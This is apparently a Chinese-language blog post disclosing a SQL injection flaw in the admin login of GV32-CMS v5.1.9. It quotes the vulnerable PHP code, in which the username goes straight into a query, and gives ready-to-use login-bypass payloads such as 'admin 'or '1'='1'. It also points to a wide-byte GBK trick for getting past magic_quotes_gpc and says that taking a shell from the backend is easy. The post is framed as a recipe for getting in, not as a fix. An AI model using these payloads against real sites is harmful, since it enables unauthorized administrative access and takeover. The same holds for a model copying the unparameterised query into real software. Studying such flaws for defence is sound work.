GV32-CMS企业建站系统 v5.1.9 getshelll

Author:roker GV32-CMS企业建站系统 v5.1.9 官方是这么说的: GV32-CMS企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统! 这尼玛最后一句话惊呆了我 so, 看到 后台登入验证文件 application\adminsys\login.php [php] function actlogin( ) { $use_nameval = $GLOBALS['Reque'] -> funpost("use_name"); /*木有过滤, 你懂得 $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd"); $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha"); $this -> logincount(); if($use_captchaval!=$_SESSION["Img"]) { $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']); $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME); $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act"); $GLOBALS['Templ'] -> display('suggestion_tpl.html'); }else{ $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 "; //exit(); $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery); if($adminInfo["emplyeeUser"]["use_id"]) { $GLOBALS['WebSe'] -> SetSession( $adminInfo ); $nowtime = time(); $adminip = $GLOBALS['Helpe'] -> getip(); //登录成功更新用户信息 $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ; $GLOBALS['MySql'] -> querySql($sqlup); //登录成功!重置IP错误信息清0! $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' "; $GLOBALS['MySql'] -> querySql( $updateip ); $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']); $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME); $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL); $GLOBALS['Templ'] -> display('suggestion_tpl.html'); //var_dump($_SESSION); }else{ $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']); $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME); $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act"); $GLOBALS['Templ'] -> display('suggestion_tpl.html'); /* header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act"); exit(); */ } } } [/php] 没有过滤 use_name 用万能密码 admin 'or '1'='1 (填账号那里)就能进去了 当然 ,有时候 帐号不是 admin 我们仔细 分析下[php] $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 "; [/php] 这样构造 [php] a' or 1 = 1 or '1'='1[/php] 要是 magic_gpc 为 on的话,如果程序的默认字符集是GBK等宽字节字符集,我们可以用宽字节绕过 后台拿shell很简单,就不说了,你们都懂得。

发表评论